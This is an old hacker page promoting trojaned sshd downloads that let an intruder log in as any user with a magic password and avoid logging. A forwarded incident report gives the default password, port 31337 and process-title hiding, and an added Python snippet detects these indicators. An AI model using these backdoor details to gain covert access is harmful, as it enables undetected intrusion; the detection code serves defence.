SSH backdoor homepage ;)


sshd-1.2.22.c.gz - nice modification of ssh 1.2.22. A backdoor that allows you to log on to the system (and stay invisible!) as any user by using a magic password. Your connection will not be logged.
sshd.c.gz - the older, 1.2.21 version of the sshd trojan.
trojan-sshd-1.2.26.tar.gz -- current version.


I received several questions about the sshd trojan; here is a simple FAQ:

Q: How to use the full power of the new 1.2.26 features?
A: sshd trojan 1.2.26 offers you a new feature: no logging, not even connection logging. To fully exploit it you must patch your own ssh client (better not to patch the ssh client on the remote server ;). You must guess which files to patch. After that, the new option -T will allow you to specify the source port.

Q: How to configure the sshd backdoor?
A: Read the source code of sshd.c :)


Well, well, well... I found that this backdoor became quite famous ;) That's good!
I think that it's really funny that such a poor and, to say it clearly, lame program is so popular ;) OK, stop that bullshit, look at this:

---------- Forwarded message ----------
Date: Tue, 13 Jul 1999 08:26:01 -0700
From: Aleph One 
To: INCIDENTS@SECURITYFOCUS.COM
Subject: sshd trojan doing the rounds

From: Martin Hamilton 

-----BEGIN PGP SIGNED MESSAGE-----


Hi, just thought people might be interested in this sshd Trojan which
some k00l d00dz (or possibly script kiddies!) put onto one of our
machines last night - it's attributed to Kil3r of Lam3rz, BTW.

There are a couple of small but significant changes from regular ssh:

  1) a backdoor password which will always let you in as any user
      (default: "sexygurl")

  2) if you connect using a build-time nominated client side port
      (default: 31337 - duh!), sshd won't log your activities

  3) process title hiding (default: /bin/sh)

It's nice code, and very well commented - they left the source around
for us to read ;-)

Although I'd heard about ssh trojans existing, this is the first one
I've actually seen with my own eyes.  Fascinating stuff...

Martin



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBN4jTNNZdpXZXTSjhAQEprwP/U6kqjXtVVXlfysUV39EshjMalaE9Dr5n
qHqOoa6HMjmRTQv5qIkBQWKYhzOwpxr3W2d7BDVFcGIcyGQIB0CGHYYBnOd+UJ94
yIEvtqHf4Gy58KZ1GdEvMiPETLBrzm50lvWAI3TeouNyVjttujYFyoJFgCjni4Eu
Yx87ZdO2w7k=
=E/Vn
-----END PGP SIGNATURE-----


Cool, nah??? ;)))
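
Added example, not part of the original page or of the forwarded message: a defender-side check for the indicators the report lists. It compares SSH flows seen on the wire with what sshd logged (the report says logging is skipped for the nominated source port) and flags an SSH listener whose process title is not sshd. The flow records, log lines, log format and process table are constructed assumptions.

```python
import re

# Defaults named in the forwarded report; a rebuilt binary may use other values.
REPORTED_SRC_PORT = 31337
SSH_PORT = 22

# Constructed flow records (src_ip, src_port, dst_port), e.g. from a firewall export.
FLOWS = [
    ("192.0.2.10", 1021, 22),
    ("198.51.100.7", 31337, 22),
    ("203.0.113.5", 40112, 22),
    ("192.0.2.44", 51000, 80),
]
# Constructed sshd syslog lines; the "Connection from <ip> port <n>" form is assumed.
SSHD_LOG = """\
Jul 12 23:01:14 host sshd[411]: Connection from 192.0.2.10 port 1021
Jul 12 23:01:15 host sshd[411]: Password authentication for alice accepted.
"""
# Constructed process table as (pid, process title).
PROCS = [(411, "/bin/sh"), (520, "/usr/sbin/httpd")]

CONN_RE = re.compile(r"sshd\[\d+\]: Connection from (\S+) port (\d+)")

def logged_connections(log_text):
    """Set of (ip, port) pairs that sshd recorded."""
    return {(m.group(1), int(m.group(2))) for m in CONN_RE.finditer(log_text)}

def unlogged_ssh_flows(flows, log_text):
    """SSH flows seen on the wire that sshd never logged, with a reason."""
    seen = logged_connections(log_text)
    findings = []
    for ip, sport, dport in flows:
        if dport != SSH_PORT or (ip, sport) in seen:
            continue
        reason = ("reported default source port" if sport == REPORTED_SRC_PORT
                  else "no sshd log entry")
        findings.append((ip, sport, reason))
    return findings

def title_mismatch(procs, listener_pids):
    """PIDs that own the SSH listener but whose process title is not sshd."""
    return [pid for pid, title in procs
            if pid in listener_pids and "sshd" not in title]
```

Matching on missing log entries rather than only on port 31337 also covers a build where the source port default was changed.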